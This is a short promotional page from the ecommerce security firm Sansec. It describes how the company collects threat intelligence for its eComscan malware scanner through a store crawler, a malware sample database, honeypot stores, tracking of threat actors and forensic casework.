Discovering new threats

eComscan is solid software but in order to really shine, it requires a constant feed of new malware intelligence. And that's where our real magic lies: in the systematic discovery of new threats.

Signal processing

The heart of Sansec HQ is our threat signal processing unit. We collect suspicious activity from all ove the world, sometimes over 200 indicators per day. Sansec security engineers process these signals around the clock. If deemed malicious, we write an experimental heuristic ("signature") which is then tested against our ecommerce malware library, live ecommerce sites and honeypot stores. Results are good? Then the signature is promoted and distributed. All customers immediately benefit from improved detection capability.

This systematic approach leads to a 99%+ malware detection rate!

Threat signal channels

a. Global crawler

Our primary source of new intel is our global crawler, which visits the top 400K+ global ecommerce stores every couple hours. Based on a long list of subtle indicators, we identify 20 to 100 hacked stores per day. Since 2015, we have identified over 100,000 compromised stores, which we analyze for new attack vectors. And can we get ahold of the store owner to alert them?

b. Malware database

Our collection of ecommerce malware is possible the largest in the world. Thanks to hundreds of partners and volunteers who submit samples to us, we are always on top of the latest developments.

c. Honeypots

Sansec has been buying ecommerce stores who went out of business. We scrub any personal data, and then redeploy their web presence. The older the store, the more attacks it typically receives. When attackers break into them, all of their steps will be recorded by our monitoring system and we learn about the latest techniques.

d. Tracking threat actors

Much of our R&D time is spent studying threat actors. Sometimes we are even able to predict their next steps so we can prepare mitigation.

Most of the semi-public criminal activity happens on dark web forums and telegram/jabber channels, where new exploits are discussed or put up for sale. There is intense competition among fraud gangs which often causes crucial information to leak.

e. Forensic cases

Sansec is the go-to authority on eCommerce security and we have been hired by more than 400 eCommerce companies to run a forensic investigation. Because of our specialization, we can usually complete a root cause analysis within hours, whereas generic security vendors require days or weeks.

Our security software is also used by other forensic investigators, who may escalate their hard cases to us. These are great opportunities for us to improve our detection patterns.

Conclusion

The profitability of digital skimming creates an ongoing struggle between merchants and cyber criminals. We are extremely motivated to be always one step ahead!